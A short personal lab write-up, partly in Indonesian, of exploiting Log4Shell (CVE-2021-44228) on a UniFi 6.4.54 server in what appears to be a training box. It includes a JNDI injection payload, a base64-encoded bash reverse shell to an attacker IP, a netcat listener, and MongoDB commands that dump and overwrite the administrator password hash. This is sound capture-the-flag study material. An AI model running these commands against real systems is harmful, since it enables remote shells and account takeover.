Unified

#Linux #Web #CVE

nmap -sC -sV -v <target_ip>

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
8443/tcp open  ssl/nagios-nsca Nagios NSCA

UniFy 6.4.54 exploit

article discuss CVE-2021-44228

Log4J

langkah selanjutnya exploitasi login page dengan burp suite

edit request json field remember (why?) dengan "${jndi:ldap://{Tun0 IP Address}/whatever}" (how?)

JNDI is the acronym for the Java Naming and Directory Interface API. By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems, such as database servers and messaging systems.
LDAP is the acronym for Lightweight Directory Access Protocol, which is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over the Internet or a Network. The default port that LDAP runs on is port 389.

karena server memberikan response, maka sistem vulnerable

mencoba analisa paket

sudo tcpdump -i tun0 port 389

menunjukkan kalau target mencoba connect back ke kita atau yang artinya sistem vulnerable

selanjutanya, membuat payload untuk dikirim ke target aplikasi

# keperluan menjalankan aplikasi java
sudo apt update
sudo apt install openjdk-11-jdk
sudo apt install maven

# keperluan aplikasi koneksi LDAP server
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package

rogue-jndi/target/RogueJndi-1.1.jar

membuat payload dalam base64 agar tdk ada issues encoding

echo 'bash -c bash -i >& /dev/tcp/{Your IP Address}/{A port of your choice} 0>&1' | base64

misal port 4444

run Rogue-JNDI

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,<BASE64 STRING HERE>}|{base64,-d}|{bash,-i}" --hostname "<your_ip>"

membuat listener

nc -lvp 4444
# atau
nc -nlvp 4444
# jangan lupa allow firewall port 4444

kembali ke burp suite, ubah request

${jndi:ldap://{Your Tun0 IP}:1389/o=tomcat}

kembali ke listener

script /dev/null -c bash

didapat user, lalu mencari privileges

cek Mongo DB yang memungkinkan mendapat credential

ps aux | grep mongo

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);" | more

ubah hash password administrator

mkpasswd -m sha-512 Password1234

mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"<SHA_512 Hash Generated>"}})'

cek lagi jika perlu

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);" | more

login ke website dan cari setting->site ssh authentication setting